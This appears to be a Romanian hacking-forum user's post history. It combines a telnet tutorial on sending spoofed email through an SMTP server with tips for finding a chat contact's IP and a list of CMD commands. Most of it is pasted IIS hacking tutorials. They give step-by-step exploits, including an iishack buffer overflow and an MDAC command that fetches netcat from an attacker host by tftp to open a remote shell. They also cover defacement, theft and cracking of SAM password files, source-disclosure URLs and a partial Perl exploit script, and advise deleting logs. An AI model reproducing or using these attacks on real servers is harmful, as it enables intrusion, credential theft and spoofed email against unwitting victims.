BizZaroO
-
Posts
195 -
Joined
-
Last visited
Posts posted by BizZaroO
-
-
Salut!
Intrebare... Stie cineva linkul asta: https://appleid.apple.com/cgi-bin/WebObjects/MyAppleId.woa/wa/validateAppleID?appleid=... era valabil intr-un timp, acum nu mai e...
Aveti idee in ce s-a schimbat si cum pot sa gasesc acum daca o adresa de email este alocata unui apple id?
Multumiri in avans,
BizZaroO
-
Atentiune!
Acest blog contine cultura la un nivel riscant. Daca apar manifestari placute adresati`va adminului blogului.
Recrutez Autori!!
Daca iti place sa scri si sti sa te exprimi intr`un mod cat mai artistic si inteligent atunci poti avea propria ta categorie pe blog. pentru mai multe detalii trimite un mail cu un articol de`al tau (fara fisiere atasate) si daca imi place cum scrii vei avea propria ta categorie unde iti vei putea spune in pace parerea despre orice!!
-
BizZaroO a revenit
sper ca a mai crescut rst de la ultima mea vizita... Ras vad ca inca mai esti pe aici bv...
-
Deci sa lamuresc situatia...
1. tutorialul nu e facut de mine... eu nu fac tutoriale pentru ca nu am talent sa explic
2. nu e copy si paste pentru ca il am de mult timp in calculator... si inca mai am multe tutoriale
L.e : SIGKILL01 nu cred ca sti nici pe jumatate din cat stiu io... u o sa ai drepul sa ma jugnesti cand o sa ai ceva vechime si o sa pui si tu neste programe si neste chesti care sa ajute lumea
-
yonyx16
Il trimiteti cuiva ( pe mess ) si in timp ce se trimite serverul intrati in CMD si scrieti : "netstat -n" si dati enter . Asa veti afla IP victimei ( are portul 5101 , o sa gasiti )
ma fi atent explica-mi ceva... am scris netstat -n iesea imediat din el
am scris netstat simplu sta putin arata neste ip si porma iese
deci???
iti zic eu ca ai scris tu netstat -n in run... daca scriai in cmd nu iti iesea!
pare rau ras dar in cmd am scris ma rog... oricum am rezolvat problema
-
TELNET
Ce insemana telnet?
Telnet ccs(cunoscut ca s) emulator terminal, este o consola care da voie unui user sa foloseasca resursele altui sistem, conectandu-se folosing adresa de IP. Desigur, telnet este ca un Trojan, atasandu-se de server sau ca serverul. Folosind clientul telnet un utilizator se conecteaza la un server telnet pe un port specific. Portul specific pentru Telnet este 23. As putea spune ca telnet este cel mai bun instrument pentru hackeri. Totzi hackerii mari il folosesc pentru exploaterea sistemelor loophole. Poti rula telnet intrand in Run si scriind telnet, apoi apasand enter. In general la Win 9x/Me va aparea direct, dar la WinXP sau 2000, va aparea in Dos.
Pentru a rula telnet in Windows 95/98/M, doar deschideti un fisier in Notepand.exe in care scrieti urmatoarele:
REGEDIT 4 [HKEY_USERSS-1-5-21-1229272821-1563985344-1060284298 1003SoftwareMicrosoftTelnet]"MODE"="CONSOLE"
Salveaza fisierul sub numele de vreau_sa_fiu_un_mare_hacker.reg, si ruleaza-l.
Or simple run Ms-Dos or Command(XP) si scrie telnet, apoi scrieti "?/help" pentru a vizualiza o lista de comenzi.
Ce as putea face cu telnet?
De obicei hackerii se conecteaza la sistemul telnet, format din Host si Port, incercand sa intre in root. Mai intai va trebuie un Port Scan f.bun care sa scaneze toate porturile dintr-un sistem, introduceti de exemplu stefanx.ro si scanati portul 25. Dupa care conectativa la acel port folosind telnet. De exemplu am scanat serverul de web al unui prieten, care din intamplare este un mare web developer si am descoperit ca are portul 25 dealungul unui daemon SMTP ruland in el. Deci folosind telnet, m-am conectat la serverul lui, pe portul 25 folosind clientul SMTP, am trimis cateva mailuri anonime la cativa prieteni...
exemplu:
c:telnet
Welcome to Microsoft Telnet Client
Escape Character is 'CTRL+]'
Microsoft Telnet> open sharka.ro 25
Connecting to stefanx.ro....
Connected..
.
.
.
acum serviciul SMTP este al meu.. Doar m-am jucat putin... daca nu stii comenzile telnet, scrie 'HELP' pentru win9x sau '?/HELP' pentru winXP. -Nota: La SMTP, portul specific este 25.
Acum va voi arata cum sa trimiteti un mail fals prin protocolul ESMTP(Extended Simple Mail Transfer Protocol):
Telnet>open stefanx.ro 25
Connecting....
Connected to stefanx.ro
220 Welcome to stefanx.ro ESMTP service 8.9.3
HELO Stefan
220 Welcome to sendmail Stefan
MAIL E-mail
240 Sender set to E-mail
RCPT E-mail
240 Recipient set to E-mail
DATA
220 End with "."
Subject : Salut pizza!
Stii ce, trimit maiuri false prin SMTP-ul tau, nu te supara.
.
240 CA55910 Message accepted for delivery..
Gandeste-te ce inseamna valorile 240 si 220 si CA55910.. .
Valorile 240 si 220 sunt codurile mesajelor trimise de catre server. De exemplu serverul va raspunde cu valoarea 220 pentru a arata o poza...vei vedea toate pozele care au venit odata cu 220...
In legatura cu CA55910... este MSGID sau Message ID... in server, fiecare mesaj trimis sau primit are o identificare, acest mesaj are CA55910, cum ar fi IP-ul tau, politia te va identifica dupa IP.L:o)L. De aceea o sa incer sa scriu o lectie despre spoofing, ce inseamna cum sa iti ascunzi IP-ul.
Note: This is my earnest request to each and everybody who reads this manual.. please do not send any fake mail at E-mail and please do not use the service at anisurrahman.net He is a very good friend of mine.. I have learnt many things regarding web designing and web programming from him..
RETINE: Uneori nu te poti conecta la unele servere...de ce? Nici eu nu stiu, poate acestea au firewall, sau poate din cauza ca nu am eu destula cunostiinta.
Yes !!! Am trimis un mail fals !!! Sunt hacker !!! OK !!!
Ca ai trimis un mail fals nu inseamna ca esti hacker. Nu are de-a face cu hacking. Mail-urile false pot fi detectate cu usurinta, la fel ca si ISP-ul, si iti poti pierde contul la ISP. Apoi, daca victima trimite un e-mail catre E-mail si se plange de activitatea ta, atunci imi pare rau, iti pierzi contul la ISP.
Oricum, incearca sa iti trimiti mail-uri false singur, incercand sa te obisnuiesti cu telnet.
Nu te bucura si nu incepe sa hackuiesti cu telnet, ca nu e asa de usor cum pare. Mi-am facut singur serviciul de SMTP sharka.ro, si inca nu am putut sa iau root de la el.
Desigur sunt mult mai multe pe care le poti folosi prin telnet. De exemplu poti incepe cu IRC(internet relay chat). Sunt sigur ca il cunoasteti toti. Se poate folosi mIRC-ul, dar nu poate face foarte de multe...
Acum cred ca este vreamea sa va arat cum functioneaza un server de IRC si/sau mIRC.
Pentru a incepe sesiunea, programul trebuie conectat la un server de IRC. Porturi specifice sun 6667, 6668, 7000 etc. in mIRC
cand vrei sa te conectezi la un server, portul este de-obicei 6667. Scrie: /sever geneva.ch.eu.undernet.org 8000 in fereastra mIRC.
Daca nu pui nici un port, programul il va lua drept 6667.
Aceasta comanda te va conecta la serverul geneva.ch.eu.undernet.org apoi scriind /join #canal vei intra pe un canal, incepand sesiunea
Tip : Pentru a vedea IP-ul unui user, este simplu... Scrie doar: /whois nick in fereastra canalului. Daca sunteti la un icafe, puteti accesa cu usurinta hardul calculatorului, care de obicei este protejat de catre un icafe manager, scriind comanda /run c: .
Acum cred ca cunoasteti chestiile de baza din mIRC.
Acum sa ajungem la punct, incepand o sesiune IRC cu telnet.
In general foarte multe programe warfare(warez), sunt facute pentru flood, ceea ce insemna sa inunzi cu acelasi mesaj, cauzand ca cei conectati sa nu mai poata vb intre ei, iar ceilalti sa nu se mai poate conecta. Dar te poate detecta cu usurinta, dupa nick, afland-uti IP-ul. Programele facute de mine se conecteaza fara nick, aflandu-se o pauza(loc liber) pe lista cu clienti din canal, deci mesajul este trimis de catre nimeni ,iar eu fiind acea pauza, dar si asa...
Acum sa incepem... conectarea telnet la un server IRC pe portul 6667
Telnet>open brussels.be.eu.undernet.org 6667
<vei vedea niste mesaje in acest timp>
nick <crystygye>
<alte gunoaie de la server>
user <crystygye 127.0.0.1 localhost :HC>
<acum vei vedea o gramada de mesaje de la server>
retine: sa nu scrii si semnele <>... eu le-am folosit ca sa nu incurc mesajele cu altele.
acum esti conectat la server de mIRC, poti folosi comenzile de mIRC, dar fara ascrie un mesaj privat:
PRIVMSG NICK MESSAGE : <Salut draga... Iti arde de-o discutie? Sau da bula?>
"sau da bula" am scris intentionat(da = de).
Acum cu siguranta stiti cate ceva despre telnet.
Cu telnet poti accesa si/sau controla un calculator conectat la internet (Remote Computer).
Ideea de conectare prin telnet
De obicei telnet este folosit pentru conectarea la un server particular. De obicei hackerii il folosesc pentru a avea root la acel sistem. Daca crezi ca te poti conecta la SMTP-ul ISP-ului tau si vei avea root la ISP'ul tau, atunci uita de toate astea. In primul rand hackerii scaneaza porturile intr-o anumita tinta(IP, sau numele serverului), pentru a gasi porturile deschise.
Tip: Puteti folosi "Front Ambush". Este un port scanner foarte rapid. Il puteti downloada de pe pagina de internet a Ingerului Negru - http://www.seinfeld.go.ro
Dar daca ISP-ul tau te prinde ca le scanezi porturile, atunci nu te supara pe mine.
Acum sa zicem ca ai gasit un server ftp cu portul 23. Tot ce trebuie sa faci este sa te conectezi cu telnet la port. Dar lucrurile nu pot sta asa de usor... majoritatea serverelor de ftp (aprox. 98%) iti dau acces doar cerand user si parola valide, deci trebuie sa ai un cont ca sa te poti conecta cu user-ul si parola ta la contul tau... sau la contul altora daca ai si parola.
Tip: Pentru a nu fi prins, sa stie si de IP Spoofing. Folosit pentru ascuderea IP-ului, voi face un manual complet si despre asta, il puteti lua de pe aceeasi pagina.(http://www.seinfeld.go.ro)(http://www.dd-hacking.go.ro)
-
Consider ca pentru a fi cu adevarat un "hacker" trebuie intai sa sti sa iti folosesti "armele" care le ai la indemana... cea mai buna "arma este" cmd
TUTORIALUL NU ESTE FACUT DE MINE
Dat fiind faptul ca nu este pus un astfel de tutorial ...
Uite cum sta treaba...daca stii sa umblii cu adevarat bine in command prompt,chiar nu ai nevoie de alte programe k sa fii un "hacker".Majoritatea utilizatorilor de Windows nu stiu cu adevarat ce arma puternica au instalata pe pc-ul lor si traiesc cu ideea k linuxu este cu mult superior win la partea de hacking.Ei bine o sa va demonstrez k nu e asa.O sa incepem cu unele comenzi usoare cum ar fii:
-aflarea ip-ului celor de pe mess: k sa aflii ip-u trebuie doar sa intrii in START>RUN si sa tastezi comanda "cmd".Dupa ce apare fereastra de la Command Prompt scrii "netstat -an" si nu degeaba v-am tinut eu lectia cu porturile,acum e folositoare pt k dupa ce tastezi "netstat -an" iti apar o serie de ip-uri la care pc-ul tau s-a conectat.Si cum yahoo messenger foloseste de obicei portu 5101 ... ip-urile pe care vrei sa le aflii au portu 5101
-aflarea ip-ului unui server,site: pt asta tastezi comanda "tracert si site-u la care vrei sa aflii ip" EX: tracert www.yahoo.com
Bine k acu pot eu sa stau 2 ani sa va scriu aici tot ce stiu despre cmd si tot nu termin,am sa va dau in schimb lista comenzilor (nu toate) din cmd si ramane sa exersati si voi.
ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes
BROWSTAT Get domain, browser and PDC info
CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colours of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSVDE Import or Export Active Directory data
DATE Display or set the date
Dcomcnfg DCOM Configuration Utility
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directoryDSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory
ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the CMD shell
EXPAND Uncompress files
EXTRACT Uncompress CAB files
FC Compare two files
FDISK Disk Format and partition
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR Conditionally perform a command several times
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line
HELP Online Help
HFNETCHK Network Security Hotfix Checker
IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
INSTSRV Install an NT Service
IPCONFIG Configure IP
KILL Remove a program from memory
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer.
LOGOFF Log a user off
LOGTIME Log the date and time in a file
MAPISEND Send email from the command line
MEM Display memory usage
MD Create new folders
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files
NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights
PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PUSHD Save and then change the current directory
QGREP Search file(s) for lines that match a given pattern.
RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Read, Set or Delete registry keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files.
REPLACE Replace or update one file with another
RD Delete folder(s)
RDISK Create a Recovery Disk
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)
SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
ScriptIt Control GUI applications
SET Display, set, or remove environment variables
SETLOCAL Begin localisation of environment changes in a batch file
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
START Start a separate window to run a specified program or command
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
TASKLIST List running applications and services
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file
USRSTAT List domain usernames and last login
VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label
WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics IIWMIC WMI Commands
XCACLS Change file permissions
XCOPY Copy files and folders
incercati sa va obijunuiti cu aceste comenzi si sa le intelegeti pe fiecare in parte.
-
yonyx16
Il trimiteti cuiva ( pe mess ) si in timp ce se trimite serverul intrati in CMD si scrieti : "netstat -n" si dati enter . Asa veti afla IP victimei ( are portul 5101 , o sa gasiti )
ma fi atent explica-mi ceva... am scris netstat -n iesea imediat din el
am scris netstat simplu sta putin arata neste ip si porma iese
deci???
-
mie imi zice ca lipseste Mswinsck.ocx desi e akolo
-
Hacking IIS Tutorial
deface : frontpage : rds : main
The Internet Information Server Attack - Remote buffer overflow exploit.
By r00tsec from Security Espionage Community.
Revised 03/16/00.
This site is also available in plain text.
Forewords:
This text goes out to all those NT hackers out there. It is based on the info I have from eEye Digital Security Team, which found the exploit, and my own experience.
Note: All the files used in this paper can be found at the main page.
According to eEye Digital Security Team the systems affected include:
Internet Information Server 4.0 (IIS4)
Microsoft Windows NT 4.0 SP3 Option Pack 4
Microsoft Windows NT 4.0 SP4 Option Pack 4
Microsoft Windows NT 4.0 SP5 Option Pack 4
I performed the attack from a Windows NT 4.0 machine with the required programs:
iishack.exe
ncx.exe or ncx99.exe or BertzSvc.exe
Ncx.exe is a hacked up version of the program netcat.exe. Ncx.exe always passes -l -p 80 -t -e cmd.exe as its argument, which means that it binds cmd.exe to port 80. The eEye people has received some reports from people not being able use the ncx.exe, so they have made another hacked up version of netcat.exe, ncx99.exe. Ncx99.exe binds cmd.exe to port 99 instead of port 80, which should solve the problem. The reason of why ncx.exe doesn't work sometimes is that inetinfo.exe has to be exited, before it can work. Ncx.exe fits under the description Trojan horse! To kick inetinfo.exe use avoid.exe (which also soon will be available at the web site). BertzSvc.exe binds cmd.exe to port 123 instead.
How to do it:
First of all you'll need a server running IIS4, NT4 and/or SP3/4/5 + OP4. To find such, go to www.netcraft.com or you favorite “what's-this-site-running-search-engine” and find a victim running the affected system.Second, you need to craft a buffer overrun about 3 k on the target machine!
Then launch iishack.exe via the command prompt in WinNT.
Output:
--------(IIS 4.0 remote buffer overflow exploit)----------
© dark spyrit -- barns@eeye.com. http://www.eEye.com
[usage: iishack <host> <port> <url> ]
eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe
do not include 'http://' before hosts!
----------------------------------------------------------
Then issue the command as you can see beneath ex.
C:\>iishack www.victim.com 80 YourOwnIpAddress/ncx.exe
Output (if successful):
Data sent!
note: Give it (the IIS) enough time to download ncx.exe. Hint: Use Rasmon.exe to monitor your outgoing bytes.
After that type telnet www.victim.com 80 in cmd.exe or in the start/run menu.
Output:
Microsoft® Windows NT
© Copyright 1985-1996 Microsoft Corp.
C:\>
Voila! Access granted!
Do you whatever you wanna do, but remember to:
- add a scheduled task to restart inetinfo.exe in X minutes. (AT command will do it)
- add a scheduled task to delete ncx.exe X-1 minutes.
- clean the log files (if there are any).
Corrections, suggestions or comments are accepted here
---------------------------------------------------------------
Hi Folks,
i have just compiled the well-known IIS tricks. I hope it
will be helpful for securing your server.
any comment,suggestion or insult...? wellcome
MAB-
SECURING IIS by BREAKING
=====================================================
by Mount Ararat Blossom
9/15/2000
mount_ararat_blossom@hotmail.com
=====================================================
01- Abstract
I am not sure what you want to get out of this but basically this paper
is intended on breaking merely IIS web servers especially versions 4.0 and
5.0 via TCP/IP over the port 80. This techniques works against even
so-called secure networks just because every network even those secured ones
lets HTTP connections in.
=====================================================
02- Intro
Alright so you all wanna know how to break into IIS web servers? First off,
you should find a cgi-scanner so that things will get easier. My personnel
preferences are
"whisker" by "rain forest puppy" (www.wiretrip.net/rfp).
"cis" by "mnemonix" (www.cerberus-infosec.co.uk)
To understand which server is running on the victim site
telnet <victim> 80
GET HEAD / HTTP/1.0
and there you go with the name and the version of the web server. However
some sites might run their web servers over 8080, 81, 8000, 8001, and so on.
To understand SSL web servers, which provides encryption between the web
server and the browser we use the tool "ssleay"
s_client -connect <victim>:443
HEAD / HTTP /1.0
and here we go again.
As i am writing this i am hoping that you will be able to use this to
secure your web servers instead of using this to break into others.
=====================================================
03- Game Starts
========IIS HACK=====
The folks at www.eeye.com, have found a vulnerability on IIS 4.0 which
allows us to upload a crafted version of netcat (hacker's swiss army knife)
onto victim server and binds a cmd.exe on port 80.
The vulnerabliy was a bufferoverflow in .htr .idc and .stm files. The
problem is with insufficient bounds checking of the names in the URL for
.htr .stm and .idc files, allowing hackers to insert some backdoors to
download and execute arbitrary commands on the local system as the
administrator user.
To hack the victim site we need
iishack.exe
ncx.exe (you can find these two at
plus we need a web server running at our attacking box.
First off, run the web server on your attacking box and place
the ncx.exe on your root directory.
then run iishack.exe against the victim site
c:\>iishack.exe <victim> 80 <evil_hacker>/ncx.exe
Then here we go, go and get your swiss army knife, namely netcat,
c:\>nc <victim> 80 ==============>>>BOOM!
the command promt from the victim site suddenly appears on your box !!!
D:\> or whatever it is , C;E;...
do you want me to xplain what to do next, hey common you must be kidding
...hehe....
=========MDAC- Local Command Execution===========
You might think that it is a years-old vulnerability, however what i see on
pen-tests is that almost 40% of IIS web servers are still vulnerable to
this.
IIS' MDAC component has a vulnerability where an attacker can submit
commands for local execution.
The core problem is with the RDS Datafactory. By default, it allows remote
commands to be sent to the IIS server. The commands will be run as the
effective user of the service, which is typically the SYSTEM user.
I wont get into details, if you want go and check RFP's web
site. However, you can find a vulnerable site by checking
c:\>nc -nw -w 2 <victim> 80
GET /msadc/msadcs.dll HTTP
and if you get the following
application/x_varg
it is most probably vulnerable if not patched.
You can find the exploit, mdac.pl and msadc2.pl from rain forest puppy's
web site at www.wiretrip.net/rfp It checks for the vulnerability and if it
is vulnerable then it asks for the command you wanna execute:
c:\> mdac.pl -h <victim>
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c
if you wanna change the web site which is located at
d:\inetpub\wwwroot\victimweb\index.htm
then you can type:
cmd/c echo hacked by me > d:\inetpub\wwwroot\victimweb\index.htm
or what ever you want but my personnal preference is uploading our swiss
army knife, netcat, and binding it to the cmd.exe to the port 80. To do that
i set up my TFTP server and put nc.exe in it. Then when i am asked to type
the command i want to execute, i type the following:
cmd/c cd %systemroot%&&tftp -i <evil_hacker> GET nc.exe&&del ftptmp
&& attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe
there you go, go on fire your netcat against the victim over port 80, you
get the eggshell, cmd.exe.....
=========Codebrws.asp & Showcode.asp ==================
Codebrws.asp and Showcode.asp is a viewer file that ships with Microsoft
IIS, but is
not installed by default. The viewer is intended to be installed by the
administrator to allow for the viewing of sample files as a learning
exercise; however, the viewer does not restrict what files can be accessed.
A remote attacker can exploit this vulnerability to
view the contents of any file on the victim's server. However, there are
several issues to be aware of:
1. Codebrws.asp and showcode.asp are not installed by default.
2. The vulnerability only allows for viewing of files.
3. The vulnerability does not bypass WindowsNT Access Control Lists
(ACLs).
4. Only files in the same disk partition can be viewed.
5. Attackers must know the location of the requested file.
Lets say you wanna see the code of codebrws.asp request the following from
the from your favorite web browser,
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/
iisamples/exair/howitworks/codebrws.asp
then you will see the source code of codebrws.asp
For using showcode.asp, do the following again from your infamous browser
There you go, you get the infamous sam._ file, copy it, expand it and crack
it using Lophtcrack, my personal choise, and you will get all user passwords
even the administrator one.
=========Null.htw===============
Microsoft IIS running with Index Server contains a vulnerability
through Null.htw even if no .htw files exist on the server. Thevulnerability
displays the source code of an ASP page or otherrequested file. The ability
to view ASP pages could provide sensitive information such as usernames and
passwords. An attacker providing IIS with a malformed URL request could
escape the virtual directory, providing access to the logical drive and root
directory. The "hit-highlighting" function in the Index Server does not
adequately restrain what types of files may be requested, allowing an
attacker to
request any file on the server. Microsoft has released a patch for Windows
2000 addressing this vulnerability.
Null.htw function has 3 variables which gets their inputs from the user.
These variables are as follows
CiWebhitsfile
CiRestriction
CiHiliteType
Respectively.
Say that, we wanna see the source code of default.asp, the type the
following from your favorite browser
and you will get the source of default.asp file.
========webhits.dll & .htw================
The hit-highligting functionality provided by Index Server allows a web
user to have a document with their original search terms highlighted on the
page. The name of the document is passed to .htw file with the CiWebhitsfile
argument. Webhits.dll, the ISAPI Application that deals with the request,
opens the file highlights accordingly and returns the resulting page. As the
user has control of the CiWebhitsfile argument passed to the .htw file they
can request anything they want. And the real problem is that, they can view
the source of ASP and other scripted pages.
To unserstand you are vulnerable, request the following from the site
http://www.victim.com/nosuchfile.htw
if you get the following from the server
format of the QUERY_STRING is invalid
it means that you are vulnerable.
The problem is because of webhits.dll (an ISAPI Application) associated to
.htw files. You can find the .htw files in the following locations of
infamous IIS web server,
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (this is normally for loopback)
An attacker, for instance view the contents of sam._ file as follows
will reveal the contents of sam._ file, which is binary, you should copy
it, expand it and crack it as i explained several times before.
===ASP Alternate Data Streams(::$DATA)==================
The $DATA vulnerability, published in mid-1998, results from an error
in the way the Internet Information Server parses file names. $DATA is an
attribute of the main data stream (which holds the "primary content") stored
within a file on NT File System (NTFS). By creating a specially constructed
URL, it is possible to use IIS to access this data stream from a browser.
Doing so will display the code of the file
containing that data stream and any data that file holds. This method can be
used to display a script-mapped file that can normally be acted upon only by
a particular Application Mapping. The contents of these files are not
ordinarily available to users. However, in order to display the file, the
file must reside on the NTFS partition and must
have ACLs set to allow at least read access; the unauthorized user must also
know the file name. Microsoft Windows NT Server's IIS versions 1.0, 2.0, 3.0
and 4.0 are affected by this vulnerability.
Microsoft has produced a hotfix for IIS versions 3.0 and 4.0. The fix
involves IIS "supporting NTFS alternate data streams by asking Windows
NT to make the file name canonical" according the Microsoft.
To view or get the source of an .asp code, type the following from your
browser
http://www.victim.com/default.asp::$DATA
and you will get the source code.
=========ASP Dot Bug====================
The famous Lopht group has discovered the ASP dot bug in 1997. The
vulnerability involved being able to reveal ASP source code to attackers. By
appending one or more dots to the end of an ASP URL under IIS 3.0, it was
possible to view the ASP source code.
The exploit worked by appending a dot the end of an ASP as follows
http://www.victim.com/sample.asp.
======ISM.DLL Buffer Truncation===============
This bug was found by Cerberus Information Security team. It runs on IIS
4.0 and 5.0. that allows attackers to view the content of files and source
code of scripts.
By making a specially formed request to IIS, with the name of the file and
then appending around 230 + “ %20 “ (these represents spaces) and then
appending “ .htr ” this tricks IIS into thinking that the client is
requesting a “ .htr “ file . The .htr file extension is mapped to the
ISM.DLL ISAPI Application and IIS redirects all requests for .htr rsources
to this DLL.
ISM.DLL is then passed the name of the file to open and execute but before
doing this ISM.DLL truncates the buffer sent to it chopping off the .htr and
a few spaces and ends up opening the file we want to get source of. The
contents are then returned.
This attack can only be launched once though., unless the web service
started and stopped. It will only work when ISM.DLL first loaded into
memory.
An attacker can view the source of global.asa, for instance, as follows
http://www.victim.com/global.asa%20%20(...<=230)global.asa.htr
will reveal the source of global.asa
==========.idc & .ida Bugs=======================
This exploit, actually, similar to ASP dot bug, however this time we get
the path of web directory on IIS 4.0. I have even seen this bug working on
IIS 5.0 on my pen-tests. By adding an “.idc” or “.ida” extension to the end
of URL will cause IIS installations to try to run the so-called .IDC through
the database connector .DLL. If the .idc doesnt exists, than it will return
rather informative about the server.
http://www.victim.com/anything.idc or anything.idq
you will get the path.
============+.htr Bug===========================
This exploit is also ever so similar to dot asp bug and you can get the
source code of ASA and ASP files by appending a +.htr to the URL of asp and
asa files.
http://www.victim.com/global.asa+.htr
you may get the source code to browse
===========NT Site Server Adsamples Vulnerability ======
By requesting site.csc, which is normally located in
/adsamples/config/site.csc,
The attacker may be able to retrieve the DSN, UID and PASS of the database
as this file may contain them.
By typing the following
http://www.victim.com/adsamples/config/site.csc
the attacker will download the file site.csc and (s)he can get some
important data.
==========Password Attack to User Accounts===========
IIS 4.0 has an interesting feature that can allow a remote attacker to
attack user accoounts local to the web server as well as other machines
across to the internet. Added to this if your Web server is behind a
firewall performing NAT (network address translation), machines on inside
could be attacked as well.
By default every install of IIS 4.0 creates a virtual directory “
/iisadmpwd “. This directory contains a number of .htr files. Anonymous
users are allowed to access this files, they are not restricted to loopback
address(127.0.0.1). The following is a list of files found in the .iisadmpwd
directory, which physically maps to c:\winnt\system32\inetsrv\iisadmpwd
Achg.htr
Aexp.htr
Aexp2.htr
Aexp2b.htr
Aexp3.htr
Aexp4.htr
Aexp4b.htr
Anot.htr
Anot3.htr
This files are pretty much of the same variants of the same file and allow
a user to change their password via web. It can also be used to enumerate
valid accounts through guess work.
If the user account does not exist, a message will be returned saying
“invalid domain”.
If the account exists, but the password is wrong then the message will say
so.
If an IP address followed by a backslash precedes the account name then the
IIS server will contact the remote machine, over the NetBIOS session port
139, and attempt to change to user’s password. (x.x.x.x\ACCOUNTNAME)
Therefore, if you do not need this service, remove the /iisadmpwd
directory. This will prevent attackers.
=============Translate:f Bug ====================
Daniel Docekal brought this issue in BugTraq this summer, August 15, 2000.
(www.securityfocus.com/bid/1578) The actual problem is with the WebDAV
implementation in office 2000 and FrontPage 2000 Server Extensions.
When someone makes a request for ASP/ASA or anyother scriptable page and
adds “translate:f “ into headers of HTTP GET (headers are not part of URL,
part of HTTP request), then they are come up with complete ASP/ASA source
code on Win2K SP1 not installed.
Translate:F is a legitimate header for WebDAV and is used in WebDAV
compatible client and in FP2000 to get the file for editing.
Simple adding of “translate:f” and placing “/” at the end of request to HTTP
GET will lead in security bug.
It is a Win2K bug, but due to FP2000 installed IIS4.00, it is also a IIS4.0
bug.
You can use the following perl script to use this exploit.
#############################
use IO::Socket; #
my ($port, $sock,$server); #
$size=0; #
#############################
#
$server="$ARGV[0]";
$s="$server";
$port="80";
$cm="$ARGV[1]";
&connect;
sub connect {
if ($#ARGV < 1) {
howto();
exit;
}
$ver="GET /$cm%5C HTTP/1.0
Host: $server
Accept: */*
Translate: f
\n\n";
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($server) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname('tcp') || die "Error: $!";
